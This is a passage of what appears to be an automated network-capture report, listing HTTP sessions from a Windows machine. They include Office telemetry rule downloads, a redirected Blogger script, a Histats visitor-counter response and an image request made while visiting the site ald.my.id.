                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          18192.168.2.749728169.150.236.1044432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC539OUTGET /igniel/blogger/master/iglo/v2.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.rawgit.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1034INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Server: BunnyCDN-IL1-1206
                                                                                                                                                                                                                                                                                                                                                                          CDN-PullZone: 201235
                                                                                                                                                                                                                                                                                                                                                                          CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                                                                                                                                                                                                                                          CDN-RequestCountryCode: US
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                                                                          Age: 37407
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3-29=":443"
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3-27=":443"
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                          Location: https://cdn.jsdelivr.net/gh/igniel/blogger@master/iglo/v2.js
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                          X-Served-By: cache-fra-etou8220086-FRA, cache-chi-kigq8000048-CHI
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: MISS, HIT
                                                                                                                                                                                                                                                                                                                                                                          CDN-ProxyVer: 1.04
                                                                                                                                                                                                                                                                                                                                                                          CDN-RequestPullSuccess: True
                                                                                                                                                                                                                                                                                                                                                                          CDN-RequestPullCode: 301
                                                                                                                                                                                                                                                                                                                                                                          CDN-CachedAt: 10/14/2024 09:12:33
                                                                                                                                                                                                                                                                                                                                                                          CDN-EdgeStorageId: 1029
                                                                                                                                                                                                                                                                                                                                                                          CDN-Status: 301
                                                                                                                                                                                                                                                                                                                                                                          CDN-RequestTime: 0
                                                                                                                                                                                                                                                                                                                                                                          CDN-RequestId: 04bab3861cd45a8c003a59d91fc999ee
                                                                                                                                                                                                                                                                                                                                                                          CDN-Cache: EXPIRED
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC94INData Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 69 67 6e 69 65 6c 2f 62 6c 6f 67 67 65 72 40 6d 61 73 74 65 72 2f 69 67 6c 6f 2f 76 32 2e 6a 73
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Moved Permanently. Redirecting to https://cdn.jsdelivr.net/gh/igniel/blogger@master/iglo/v2.js


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          19192.168.2.749734149.56.240.1274432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC737OUTGET /stats/0.php?4525035&@f16&@g1&@h1&@i1&@j1728897152149&@k0&@l1&@mCsh%20Verify&@n0&@ohttps%3A%2F%2Fald.my.id%2F&@q0&@r0&@s0&@ten-US&@u1280&@b1:105209297&@b3:1728897152&@b4:js15_as.js&@b5:-240&@a-_0.2.1&@vhttps%3A%2F%2Fald.my.id%2F&@w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: s4.histats.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 380
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC380INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 23 33 56 69 73 2e 20 74 6f 64 61 79 3d 37 31 33 30 22 3b 63 68 66 68 32 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: _HST_cntval="#3Vis. today=7130";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="as


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          20192.168.2.74973813.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 66411a6b-c01e-00a1-1eca-1a7e4a000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091233Z-17db6f7c8cf6qp7g7r97wxgbqc00000005dg000000009rgx
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          21192.168.2.74973713.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 471
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 52965a57-601e-000d-5970-1c2618000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091233Z-17db6f7c8cf9c22xp43k2gbqvn00000003wg0000000022dp
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          22192.168.2.74973613.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 474
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 6aeebda2-001e-008d-31ea-1ad91e000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091233Z-17db6f7c8cf6qp7g7r97wxgbqc00000005k00000000033w8
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          23192.168.2.74973913.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 632
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 0e59abf9-f01e-003c-2b47-1c8cf0000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091233Z-17db6f7c8cf6f7vv3recfp4a6w000000036g0000000079vf
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          24192.168.2.74974013.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 467
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: dbc5b3b7-c01e-00a2-28e5-1a2327000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091233Z-17db6f7c8cfp6mfve0htepzbps00000005r00000000002ag
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          25192.168.2.749743172.217.16.1294432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC680OUTGET /img/b/R29vZ2xl/AVvXsEhTZef2smB-4WzKsOkrjN080E4YRXcWmVbIq6jcTxUMgr56k-eUFqy-Jm7D6EXXqB1WQfk-XifK51XMT1BsWcREtTRxd8-6dGx6m_nWYjXwYtdWuSM5xKwP0FgJhf4pxe8oEKqIizH5_bYtcQc3HUz44jaH9QX0JyjQKcO_NqOZwd1QZx9dzpk_d77Uaw/s300/Best%20Auto%20Insurance.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: blogger.googleusercontent.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
